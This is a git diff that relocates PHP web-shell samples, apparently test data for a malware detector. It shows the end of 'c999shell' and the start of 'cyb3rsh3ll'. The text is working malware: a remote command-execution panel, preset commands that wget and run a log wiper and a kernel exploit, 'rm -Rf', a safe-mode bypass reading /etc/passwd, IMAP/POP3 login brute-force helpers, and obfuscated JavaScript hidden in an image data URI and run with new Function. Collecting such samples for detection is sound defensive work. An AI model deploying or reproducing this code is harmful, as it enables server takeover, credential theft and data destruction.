+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Useful Commands 
+    </div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+          <SELECT NAME="cmd">
+            <OPTION VALUE="uname -a">Kernel version
+              <OPTION VALUE="w">Logged in users
+                <OPTION VALUE="lastlog">Last to connect
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports
+                    <OPTION VALUE="locate gcc">gcc installed?
+                                        <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
+                    <OPTION VALUE="./zap2">WIPELOGS PT3
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
+                  </SELECT>
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute">
+          <br>
+        Warning. Kernel may be alerted using higher levels </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
+      <input type="hidden" name="client" value="firefox-a">
+          <input type="hidden" name="rls" value="org.mozilla:en-US:official">
+          <input type="hidden" name="hl" value="en">
+          <input type="hidden" name="hs" value="b7p">
+          <input type=submit name="btnG" VALUE="Search">
+    </form></center>
+    </td>
+</tr></TABLE><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Php Safe-Mode Bypass (Read Files)
+    </div><br>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      
+      
+      
+           
+      
+      
+      <?
+      
+      function rsg_read()
+        {       
+        $test="";
+        $temp=tempnam($test, "cx");
+        $file=$_GET['file'];    
+        $get=htmlspecialchars($file);
+        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+        if(copy("compress.zlib://".$file, $temp)){
+        $fichier = fopen($temp, "r");
+        $action = fread($fichier, filesize($temp));
+        fclose($fichier);
+        $source=htmlspecialchars($action);
+        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+        unlink($temp);
+        } else {
+        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+        access.</CENTER></FONT>");
+                        }
+        echo "</div>";
+        }
+        
+        if(isset($_GET['file']))
+{
+rsg_read();
+}
+        
+        ?>
+        
+        <?
+        
+        function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+        echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE><br>
+<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(0);}, 500);
+</script>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000">r57 c99 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
 </body></html><?php chdir($lastdir); c999shexit(); ?>
\ No newline at end of file
diff --git a/php-malware-finder/samples/classic/cyb3rsh3ll.php b/data/samples/classic/cyb3rsh3ll.php
index 4f4612b..e0e0095 100644
--- a/php-malware-finder/samples/classic/cyb3rsh3ll.php
+++ b/data/samples/classic/cyb3rsh3ll.php
@@ -1,7923 +1,7923 @@
-<?php

-//Authentication

-$lock = "on"; // set this to off if you dont need the login page

-$user = "cyber";

-$pass = "gladiator";

-$antiCrawler            = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')

-$tracebackFeature       = "off"; // set this feature to on to enable email alerts

-$log_email = "cyb3r.gladiat0r@gmail.com"; //Default e-mail for sending logs

-

-@ignore_user_abort(TRUE);

-@set_magic_quotes_runtime(0);

-error_reporting(5);

-$phpVersion = phpversion();

-$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);

-$win = strtolower(substr(PHP_OS,0,3)) == "win";

-$shver = "1.0"; //Current version

-if (!function_exists("getmicrotime")) {

- function getmicrotime() {

-  list($usec, $sec) = explode(" ", microtime()); 

-  return ((float)$usec + (float)$sec);

-  }

- }

-

-define("starttime",getmicrotime());

-

-if (get_magic_quotes_gpc()) {

- if (!function_exists("strips")) {

-  function strips(&$arr,$k="") {

-   if (is_array($arr)) {

-    foreach($arr as $k=>$v) {

-         if (strtoupper($k) != "GLOBALS") {

-          strips($arr["$k"]);

-          }

-         }

-         } else {

-        $arr = stripslashes($arr);

-        }

-        }

-        } 

-        strips($GLOBALS);

-}

-

-foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

-if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";}

-elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);}

-else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL

-

-}

-$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

-if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

-

-if (empty($surl))

-{ $surl = "?".$includestr; }//Self url 

-$surl = htmlspecialchars($surl);

-$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

-

-$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";

-//DON'T FORGOT ABOUT PASSWORD!!!

-

-$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

-$gzipencode = False; //Encode with gzip?

-

-$ax4 ="http://"; 

-$filestealth = TRUE; //if TRUE, don't change modify- and access-time

-

-$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";

-$release = @php_uname('r'); 

-$kernel = @php_uname('s'); 

-$expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text='; 

-if( strpos('Linux', $kernel) !== false ) 

-    $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 

-else 

-    $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );

-

-/* If you publish free shell and you wish add link to your site or any other information, put here your html. */

-

-$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

-

-$curdir = "./"; //start folder

-

-//$curdir = getenv("DOCUMENT_ROOT");

-$curdir = getcwd();

-$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)

-

-$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

-

-

-$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending

-

-$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

-

-if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;

-function imaplogiN($host,$username,$password){

-$sock=fsockopen($host,143,$n,$s,5);

-$b=namE();

-$l=strlen($b);

-if(!$sock)return -1;

-fread($sock,1024);

-fputs($sock,"$b LOGIN $username $password\r\n");

-$res=fgets($sock,$l+4);

-if ($res == "$b OK")return 1;else return 0;

-fclose($sock);

-}

-function pop3logiN($server,$user,$pass){

-$sock=fsockopen($server,110,$en,$es,5);

-if(!$sock)return -1;

-fread($sock,1024);

-fwrite($sock,"user $user\n");

-$r=fgets($sock);

-if($r{0}=='-')return 0;

-fwrite($sock,"pass $pass\n");

-$r=fgets($sock);

-fclose($sock);

-if($r{0}=='+')return 1;

-return 0;

-}

-function check_urL($url,$method,$search,$timeout){

-if(empty($search))$search='200';

-$u=parse_url($url);

-$method=strtoupper($method);

-$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';

-$data=(!empty($u['query']))?$u['query']:'';

-if(!empty($data))$data="?$data";

-$sock=@fsockopen($host,80,$en,$es,$timeout);

-if($sock){

